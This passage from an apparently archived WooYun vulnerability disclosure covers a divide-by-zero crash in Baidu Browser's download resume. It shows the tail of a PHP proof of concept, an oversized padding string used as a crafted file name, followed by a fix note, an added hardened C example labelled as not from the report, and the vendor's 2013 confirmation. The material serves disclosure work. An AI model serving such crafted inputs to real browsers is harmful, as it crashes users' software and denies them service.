AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); // file name shown in the client's save dialog
?>

Fix recommendation:

Don't divide by zero...
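A hardened form of the resume bookkeeping the report describes, as an added example in C; it is not code from the report or from Baidu Browser, and the state struct, function names and percentage formula are assumptions, since the page shows only the crashing div instruction. It guards both the zero divisor and the case this report triggers, where the Content-Length served on resume differs from the one recorded when the partial download was created:

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical resume state as a download manager might persist it. */
typedef struct {
    uint64_t total;    /* Content-Length recorded when the download started */
    uint64_t received; /* bytes already written to disk */
} resume_state;

/* Parse a Content-Length header value. Returns false for empty, non-numeric
 * or out-of-range values (such as the enormous number in the PoC) instead of
 * silently truncating or wrapping them. */
bool parse_content_length(const char *s, uint64_t *out) {
    char *end;
    if (s == NULL || *s < '0' || *s > '9') return false;
    errno = 0;
    unsigned long long v = strtoull(s, &end, 10);
    if (errno == ERANGE || *end != '\0') return false;
    *out = v;
    return true;
}

/* Shape of the unguarded calculation: received * 100 / total.  With total == 0
 * the x86 div instruction raises #DE, reported on Windows as
 * EXCEPTION_INT_DIVIDE_BY_ZERO (0xC0000094), exactly as in the report. */
unsigned unguarded_percent(uint64_t received, uint64_t total) {
    return (unsigned)(received * 100 / total);
}

/* Hardened: returns -1 when the resume must be abandoned (restart from byte 0
 * and, ideally, remove the stale entry so startup does not retry it forever),
 * otherwise the completion percentage 0..100.  A resume is accepted only if
 * the server now reports the same non-zero length recorded earlier. */
int resume_percent(const resume_state *st, const char *content_length_hdr) {
    uint64_t now;
    if (!parse_content_length(content_length_hdr, &now)) return -1;
    if (now == 0 || now != st->total || st->received > now) return -1;
    /* double avoids overflow of received * 100 for very large files */
    return (int)((double)st->received * 100.0 / (double)now);
}
```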

Copyright notice: please credit the source, blast@WooYun, when reposting


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 2

Confirmed: 2013-09-23 23:40

Vendor reply:

Thank you for your attention to Baidu security; we will handle this issue as soon as possible.
-- "Baidu, safer because of you"

Latest status:

None yet